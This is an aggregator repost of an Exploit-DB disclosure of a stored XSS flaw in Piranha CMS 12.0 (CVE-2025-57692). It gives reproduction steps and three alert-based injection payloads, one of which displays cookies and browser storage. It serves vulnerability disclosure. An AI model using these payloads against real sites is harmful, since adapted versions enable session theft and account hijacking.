惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Troy Hunt's Blog
GbyAI
GbyAI
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
月光博客
月光博客
Engineering at Meta
Engineering at Meta
The Register - Security
The Register - Security
阮一峰的网络日志
阮一峰的网络日志
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
F
Fortinet All Blogs
博客园 - 司徒正美
博客园 - 聂微东
T
Tailwind CSS Blog
MyScale Blog
MyScale Blog
Microsoft Security Blog
Microsoft Security Blog
Jina AI
Jina AI
A
About on SuperTechFans
Y
Y Combinator Blog
N
Netflix TechBlog - Medium
V
V2EX
I
InfoQ
WordPress大学
WordPress大学
小众软件
小众软件
The Cloudflare Blog
Recent Announcements
Recent Announcements
U
Unit 42
The Last Watchdog
The Last Watchdog
P
Palo Alto Networks Blog
Vercel News
Vercel News
罗磊的独立博客
H
Hackread – Cybersecurity News, Data Breaches, AI and More
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
M
MIT News - Artificial intelligence
Project Zero
Project Zero
美团技术团队
L
LangChain Blog
S
Security @ Cisco Blogs
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Last Week in AI
Last Week in AI
W
WeLiveSecurity
S
Securelist
H
Hacker News: Front Page
K
Kaspersky official blog
Martin Fowler
Martin Fowler
Know Your Adversary
Know Your Adversary
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
J
Java Code Geeks
P
Proofpoint News Feed
有赞技术团队
有赞技术团队
Google Online Security Blog
Google Online Security Blog
D
DataBreaches.Net

Exploit-DB.com RSS Feed

OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
terminalvenoms · 2026-02-02 · via Exploit-DB.com RSS Feed 
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting 
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome 
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md




## Reproduction Steps ##

PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser.

Reproduction steps 

	1.	Log in to the Piranha admin panel at https://<host>/manager/login.

	2.	Navigate to Pages.

	3.	Click Add Page and choose Standard Page or Standard Archive.

	4.	Enter a page title (e.g., XSS-Test).

	5.	Click the [ + ] button and select Text under Content to add a Text block.

	6.	In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.

Payload A 

<img src="x" onerror="
  alert(
    'Cookies: ' + document.cookie + '\n' +
    'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
    'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
    'URL: ' + window.location.href + '\n' +
    'User Agent: ' + navigator.userAgent + '\n' +
    'Time: ' + new Date().toLocaleString()
  )
" />

Payload B — iframe base64 

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C — details toggle (on-toggle alert)

<details open ontoggle=alert('XSS')>Click</details>

	7.	Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).

	8.	Anyone who accesses the page (or pastes the payload) will trigger the XSS.

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。